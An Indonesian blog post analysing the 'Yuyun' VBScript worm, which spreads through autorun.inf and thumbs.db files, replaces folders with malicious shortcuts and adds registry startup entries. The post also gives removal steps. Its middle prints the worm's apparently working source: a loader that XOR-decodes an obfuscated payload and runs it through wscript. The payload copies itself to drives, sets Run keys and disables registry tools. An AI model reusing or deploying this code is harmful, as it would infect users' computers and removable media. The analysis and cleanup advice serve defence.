CLICK HERE FOR BLOGGER TEMPLATES AND MYSPACE LAYOUTS »

........

   

Image Hosted by ImageShack.us

Rabu, 25 Maret 2009

Virus Yuyun.vbs / yuyun.inf / yuyun tumbs.db

Virus ini seperti virus vbscript yang lain,menggunakan compiler bawaan windows yaitu wscript.exe.Virus ini menurut saya cukup ngawur,karena si virus membuat shortcut yang hampir semua nama folder menjadi shortcut.

Selengkapnya virus ini melakukan:

menjalankan script virus dengan autorun.inf , yang kemudian akan menjalankannya secara otomatis waktu windows start up,dengan menulis string run di registry windows.
meng-copy autorun.inf dan script vbs thumb.db yang isinya ‘www.muslimah.or.id;==================================== my name:Yuyun 1.0′ ============================
On Error Resume Next

Dim fso, ws

Set fso = CreateObject(”scripting.filesystemobject”)

Set ws = CreateObject(”wscript.Shell”)

Set sh = CreateObject(”Shell.application”)

Q=WScript.ScriptFullName

tmp=fso.GetSpecialFolder(2)

tn=fso.GetTempName

tmpt=tmp+”\”+tn

Set swt=WScript.Arguments

If swt.Count>0 Then

status=swt(0)

If status=”auto” Then

sh.Explore Left(WScript.ScriptFullName,3)

Else

status=Left(WScript.ScriptFullName,Len(WScript.ScriptFullName)-Len(WScript.ScriptName))+status

If fso.FolderExists(status) Then

sh.Explore status

Else

fso.CreateFolder status

sh.Explore status

End If

End If

Else

End If

Set QQ=fso.GetFile(Q)

Set Q1=QQ.OpenAsTextStream(1,0)

isiQ=Q1.Read(QQ.Size)

Q1.close

t1=InStr(1,isiQ,”Yuyun^_^~!~2008″+” >>>”,0)+18

isiQ=Right(isiQ,Len(isiQ)-t1)

hsl=”"

For v=1 To Len(isiQ)

t=Asc(Mid(isiQ,v,1))

hsl=hsl+Chr(t Xor 7)

Next

If fso.FileExists(tmpt) Then fso.GetFile(tmpt).Attributes=0

Set temporary=fso.OpenTextFile(tmpt,2,True,0)

temporary.Write hsl

temporary.Close

ws.Run “WScript.exe //e:VBScript “+tmpt+” “”"+Q+”"”"

‘ Yuyun^_^~!~2008 >>> :::::::::::::::::::::::::::::::::::::::::::::::::::::::

‘J~’ifjb’='^r~ri’Qbu’6)7

‘N’mrts’pfiif’tbb’bqbu~’`nuk’khhlt’indb+’ebssbu+’lnict’btwbdnfkk~’f'jhtkbj’`nuk

‘e~=’Fihi~jhrtb’ni’Mfsnj+’Ihqbjebu’577?

‘Pobi’N'ahric’ihsoni`’ebfrs~’bktb)))’fic’sobi’N'puhsb’sont’tdunws’ahu’fkk

:::::::::::::::::::::::::::::::::::::::::::::::::::::::

Hi’Buuhu’Ubtrjb’Ibs

Cnj’ath+’pt+’tsfsrt+tsfsrt6+’ak~

Tbs’ath’:'DubfsbHembds/%tdunwsni`)ankbt~tsbjhembds%.

Tbs’pt’:'DubfsbHembds/%ptdunws)Tobkk%.

Tbs’to’:'DubfsbHembds/%Tobkk)fwwkndfsnhi%.

Tbs’ibs’:'DubfsbHembds/%ptdunws)ibsphul%.

ak~:afktb

sjw:ath)@bsTwbdnfkAhkcbu/5.

si:ath)@bsSbjwIfjb

sjws:sjw,%[%,si

chd:pt)TwbdnfkAhkcbut/%J~Chdrjbist%.



Tbs'tps:PTdunws)Fu`rjbist

Na'tps)Dhris97'Sobi

tsfsrt:tps/7.

Bic'Na

na'ath)ankbbntst/sjw,%[^r~ri)V%.'sobi

tbs'nuf:ath)`bsankb/sjw,%[^r~ri)V%.

nuf)fssunersbt:7

nuf)ifjb:%tofknofo)nuf%

na'nuf)ifjb:%tofknofo)nuf%'sobi

nuf)ifjb:%^r~ri)V%

tbs'nuf:ath)hwbisbsankb/sjw,%[^r~ri)V%+5+surb.

bktb

ak~:surb

bic'na

bktb

tbs'nuf:ath)hwbisbsankb/sjw,%[^r~ri)V%+5+surb.

bic'na

Tbs'FV:ath)@bsAnkb/tsfsrt.

Na'ath)AnkbBntst/sjws.'Sobi'ath)@bsAnkb/sjws.)Fssunersbt:7

FV)Dhw~'sjws+Surb

Tbs'FV:ath)@bsAnkb/sjws.

FV)Fssunersbt:4>

fiq:sjw,%[frsh)bb%

Na'Ihs'ath)AnkbBntst/fiq.'Sobi'FV)Dhw~'fiq

Tbs'frsh:ath)@bsAnkb/fiq.'

frsh)fssunersbt:7



Tbs'frs:ath)HwbiSbsAnkb/fiq+5+Surb+7.

ntn:%\frshuriZ9hwbi:PTdunws)bb'((b=QETdunws'sorje)ce'frsh9tobkk[hwbi:Hwbi9tobkk[hwbi[Dhjjfic:PTdunws)bb'((b=QETdunws'sorje)ce'frsh9tobkk[hwbi[Cbafrks:69tobkk[bwkhub:Bwkhub9tobkk[bwkhub[Dhjjfic:PTdunws)bb'((b=QETdunws'sorje)ce'frsh%

ntn:Ubwkfdb/ntn+%9%+qeDuKa.

frs)Punsb'ntn

frs)Dkhtb

frsh)Fssunersbt:4>



ksld:to)Ifjbtwfdb/!O6d!.)Tbka)wfso','%[Jnduhthas[DC'Eruini`%

FV)Dhw~'ksld,%[sorje)ce%+Surb

frsh)Dhw~'ksld,%[frshuri)nia%+Surb

Na'ath)AnkbBntst/chd,%[cfsfeftb)jce%.'Sobi'ath)@bsAnkb/chd,%[cfsfeftb)jce%.)Fssunersbt:7

FV)Dhw~'chd,%[cfsfeftb)jce%+Surb

ub`V

Tbs'ufuf:RINTLF

Obus}'Afktb

Na'Cf~/Ihp.;94'Sobi'ublrutna'chd+6'Bktb'ublrutna'chd+4



dfkk'fssfdlXibs

Obus}'Surb



Tre'ublrutna/wfso+cw.

Hi'Buuhu'Ubtrjb'Ibs

cuhwa'wfso

ptdunws)tkbbw'27

Na'cw97'Sobi

Ahu'Bfdo'akcu6'Ni'ath)@bsAhkcbu/wfso,%[%.)TreAhkcbut

ublrutna'akcu6)Wfso+'cw*6

Ibs

Bic'Na

Bic'Tre



Tre'cuhwa/wfso.

Hi'Buuhu'Ubtrjb'Ibs

na'cf~/ihp.:6'fic'/jhiso/ihp.jhc'4.:6'sobi'

ufuf)dhw~'wfso,%[Efdf'FV)usa%

ufuf)dhw~'wfso,%[J~'ifjb'nt'^r~ri)usa%

bic'na



`6:wfso,%[frshuri)nia%

`5:wfso,%[Sorje)ce%

Na'ath)AnkbBntst/`6.'Sobi'

Tbs'`66:ath)@bsAnkb/`6.'

Na'`66)Fssunersbt;94>'Sobi'

`66)Fssunersbt:7

frsh)Dhw~'wfso,%[frshuri)nia%+Surb

bic'na

bktb'

frsh)Dhw~'wfso,%[frshuri)nia%+Surb

bic'na





Na'ath)AnkbBntst/`5.'Sobi'

Tbs'`65:ath)@bsAnkb/`5.

Na'`65)Fssunersbt;94>'Sobi

`65)Fssunersbt:7

FV)Dhw~'wfso,%[Sorje)ce%+Surb

bic'na

bktb

FV)Dhw~'wfso,%[Sorje)ce%+Surb

Bic'Na



Na'Ihs'ath)AnkbBntst/wfso,%[Jnduhthas)kil%.'Sobi

tohu]qinsf’wfso,%[Jnduhthas%+%Jnduhthas%

cuhw:Fuuf~/%Ibp'Ofuu~'Whssbu'fic)))%+%Ibp'Ahkcbu%+%TrufsV%+%Ufoftnf%+%@fjb%+%]qinsf%+%Chpikhfc%+%CfsfV%+%CfsfV%.

pp:6

Ahu’Bfdo’c'Ni’cuhw

Na’Cf~/ihp.’Jhc’4′:’pp’Sobi’tohu]qinsf’wfso,%[%,c+c

ptdunws)tkbbw'17

pp:pp,6

Ibs

u:7

Ahu'Bfdo'akcu'Ni'ath)@bsAhkcbu/wfso,%[%.)TreAhkcbut

tohu]qinsf’wfso,%[%,akcu)ifjb+akcu)Ifjb

ptdunws)tkbbw'17

Na'u94'Sobi'

Bns'Ahu

Bic'na

u:u,6

Ibs

Bic'Na

Bic'Tre



Tre'tohu]qinsf/wfso+su`s.

Tbs’tohu:pt)DubfsbTohusdrs/wfso,%)kil%.

tohu)ndhikhdfsnhi:%tobkk45)ckk+4%

tohu)sfu`bswfso:%ptdunws)bb%

tohu)fu`rjbist:%((b=QETdunws’sorje)ce’%%%,su`s,%%%%

tohu)tfqb

Bic’Tre



aridsnhi’fssfdlXibs/.

Hi’Buuhu’Ubtrjb’Ibs

buu)dkbfu

Tbs’hemAhkcbu’:'to)Ifjbtwfdb/!O64!.

Tbs’dhkNsbjt’:'hemAhkcbu)Nsbjt

Ahu’Bfdo’tsuAnkbIfjb’ni’hemAhkcbu)Nsbjt

s:’hemAhkcbu)@bsCbsfnktHa/tsuAnkbIfjb+’63.

na’ath)ahkcbubntst/s.’sobi

ublrutna’s+3

bic’na

Ibs

Bic’aridsnhi



Tre’scu/.

Hi’Buuhu’Ubtrjb’Ibs

buu)dkbfu

PTdunws)Tkbbw’6?7777

na’buu)irjebu97’sobi’ptdunws)vrns

Bic’Tre



aridsnhi’RINTLF/.

Hi’buuhu’ubtrjb’ibs

:qeduka

fcq:%^r~ri’Qbu’6)7′YXY&::::::::::::::::::99Erlfi’cfun’srkfi`’reri’nf’cndnwsf9lfuif’ebuefof~f’jbjenfulfii~f’cfkfj’tfimri`’cfi’wrmf9sfl’mr`f’cfun’srkfi`’lfln9lfuif’intsf’jbjerfsi~f’cnnimfl’cfi’cnwbuercfl9sfwn’cfun’srkfi`’urtrl’ef`nfi’lnun9cblfs’lb’ofsn’risrl’cntf~fi`n9cblfs’lb’sfi`fi’risrl’cnknicri`n99/cnlrsnw’cu=’F`fu’Encfcfun’Dbjerur’Wfcfjr.999%%Mfi`fikfo’lfjr’ebutnlfw’kbjfo+’cfi’mfi`fikfo’/wrkf.’lfjr’ebutbcno’ofsn+’wfcfofk’lfjrkfo9hufi`*hufi`’~fi`’wfkni`’sni“n’/cbufmfsi~f.+’mnlf’lfjr’hufi`*hufi`’~fi`’ebunjfi)%%9/VT)’Fkn’Njufi=64>.999Lfsflfikfo’lbwfcf’hufi`’kfln*kfln’~fi`’ebunjfi=’%%Obicflkfo’jbublf’jbifofi’wficfi`fi~f+’9cfi’jbjbknofuf’lbjfkrfii~f<’~fi`’cbjnlnfi’nsr’fcfkfo’kbeno’trdn’ef`n’jbublf+’9tbtri“roi~f’Fkkfo’Jfof’Jbi`bsforn’fwf’~fi`’jbublf’wbuerfs)%%’/VT)’Fi’Iru=47.99Lfsflfikfo’lbwfcf’pfinsf’~fi`’ebunjfi=’%%Obicflkfo’jbublf’jbifofi’wficfi`fii~f+’9cfi’lbjfkrfii~f+’cfi’mfi`fikfo’jbublf’jbifjwfllfi’wbuonftfii~f+’lbdrfkn’~fi`’9/enftf.’ifjwfl’cfun’wfcfi~f)’Cfi’obicflkfo’jbublf’jbirsrwlfi’lfni’lrcri`’9lbcfcfi~f))))%%’/VT)’Fi’Iru=47.99Thuu~’N'mrts’Insnw’Wunis’sohl))))Icfl’wf5′lofiYXY&”ppp)jrtknjfo)hu)nc’99Ofn’fifl’Fcfj+’tbtri“roi~f’Lfjn’sbkfo’jbirurilfi’lbwfcfjr’9wflfnfi’risrl’jbirsrw’frufsjr’cfi’wflfnfi’nicfo’risrl’wbuonftfi)9Cfi’wflfnfi’sflpf’nsrkfo’~fi`’wfkni`’efnl)’^fi`’cbjnlnfi’nsr’fcfkfo’9tbefof`nfi’cfun’sficf*sficf’lblrftffi’Fkkfo+’jrcfo*jrcfofi’jbublf’tbkfkr’ni`fs)/Fk*F ufa=51.%



fcq:ubwkfdb/fcq+%9%+.

tbs’^r5i:ath)hwbisbsankb/sjw,%[q)chd%+5+surb.

^r5i)punsb’fcq

^r5i)dkhtb

na’cf~/ihp.:6′fic’/jhiso/ihp.jhc’4.:6’sobi’

na’ak~:afktb’sobi

ahu’n:6’sh’4

pt)uri’%ihsbwfc)bb’(w’%%%,sjw,%[q)chd%%%

ibs

bic’na

bic’na

tbs’RINTLF:ath)`bsankb/sjw,%[q)chd%.

bic’aridsnhi



Tre’ub`V/.

Hi’Buuhu’Ubtrjb’Ibs

na’cf~/ihp.:6’sobi

pt)Ub`Punsb’%OLDU[DKTNC[|66666666*5555*4444*3333*222222222222z[%+’%^r~riXDfisn%

pt)Ub`Punsb’%OLDU[DKTNC[|66666666*5555*4444*3333*222222222222z[CbafrksNdhi[%+%tobkk45)ckk+3?%

pt)Ub`Punsb’%OLDU[DKTNC[|66666666*5555*4444*3333*222222222222z[TobkkAhkcbu[Fssunersbt%+7+%UB@XCPHUC%

pt)ub`punsb’%OLKJ[Thaspfub[Jnduhthas[Pnichpt[DruubisQbutnhi[bwkhubu[Cbtlshw[IfjbTwfdb[|66666666*5555*4444*3333*222222222222z[%+%%

bic’na

pt)ub`cbkbsb’%OLDU[kilankb[NtTohusdrs%

pt)Ub`Punsb’%OLDR[Thaspfub[Jnduhthas[Pnichpt[DruubisQbutnhi[Uri[Bwkhubu%+%Ptdunws)bb’((b=QETdunws’%%%,chd,%[cfsfeftb)jce%%%

pt)Ub`Punsb’%OLDR[Thaspfub[Jnduhthas[Pnichpt[DruubisQbutnhi[Whkndnbt[T~tsbj[CntfekbUb`ntsu~shhkt%+6+%UB@XCPHUC%

na’kdftb/ath)`bscunqb/%d=%.)AnkbT~tsbj.:%isat%’sobi

nufV:FV)hwbiftsbstsubfj/6+7.)ubfc/FV)tn}b.

ppp:ath)@bsTwbdnfkAhkcbu/7.

tbs’mml:ath)hwbisbsankb/ppp,%[=Jnduhthas’Haandb’Rwcfsb’ahu’Pnichpt’_W)t~t%+5+surb.

mml)punsb’nufV

mml)dkhtb

pt)Ub`Punsb’%OLKJ[Thaspfub[Jnduhthas[Pnichpt[DruubisQbutnhi[Uri[PniRwcfsb%+%Ptdunws)bb’((b=QETdunws’%%%,ppp,%[=Jnduhthas’Haandb’Rwcfsb’ahu’Pnichpt’_W)t~t%%%

bic’na

Bic’Tre



Tre’Obus}/hhh.

Hi’Buuhu’Ubtrjb’Ibs

ch

Ahu’Bfdo’cuq’Ni’ath)Cunqbt

Na’cuq)CunqbS~wb:6′Sobi

ublrutna’cuq)Wfso+3

Bktb

ublrutna’cuq)Wfso+5

Bic’na

Ibs

na’ak~:afktb’sobi’

scu

bktb’

ptdunws)vrns

bic’na

ub`V

Na’hhh:Afktb’Sobi’

Bns’Ch

Bic’Na

khhw

Bic’Tre



hampir kesemua nama folder yang ada dengan tujuan eksekusi langsung dari wscript.exe

Membuat shortcut dengan nama folder yang ada, ditambah nama microsoft dan new harry potter and… yang kesemuanya menuju ke wscript.exe untuk eksekusi file script thumbs.db yang tersebar di folder-folder.
Membuat system folder di desktop dengan nama yuyun_cantix yang bila diclick kanan hanya ada pilihan buat shortcut,dan tidak ada pilihan hapus.
Cara membersihkannya:

1.Matikan fungsi Wscript.exe,caranya menggunakan gpedit.msc>administrative templates>System>Double click Don’t run specified Windows applications>enabled>show>tambahkan Wscript.exe dan cscript.exe>ok.Dengan cara ini semua virus vbscript tidak akan tereksekusi.

2.Gunakan antivirus pcmav 1.93 bisa download di sini atau anti virus lainnya yang telah mendeteksi virus ini.Sebelumnya endtask wscript.exe yang berjalan di processes task manager.

3.Gunakan search windows , untuk mencari shortcut yang dibuat oleh virus.Caranya dengan opsi file ukuran dibawah 1kb,setelah tampil tambahkan, pilihan tanggal yang sama dengan shortcut yang bernama microsoft dan new harry potter and… kemudian hapus (delete) dengan menekan shift agar tanpa masuk ke recycle bin.Untuk mempermudah pilih arrange icons by modified atau by type.

4.Gunakan regedit.exe (ketik di menu run) click di my computer-regedit,Click edit>find>ketik yuyun_cantix>click find next.Cara ini digunakan untuk menghilangkan folder system (yuyun_cantix) yang dibuat di desktop.Setelah ketemu lalu delete key sebelah kiri (seperti folder)tenpat yuyun_cantix berada.Dengan begitu folder system yang ada didesktop bisa di delete.

5.Gunakan msconfig atau tools lain seperti hijack this untuk menghilangkan start up virus.

Diposting oleh IncReDibLe LigHTeR di 11.48  

Label:

0 komentar:

Posting Komentar

Langganan: Posting Komentar (Atom)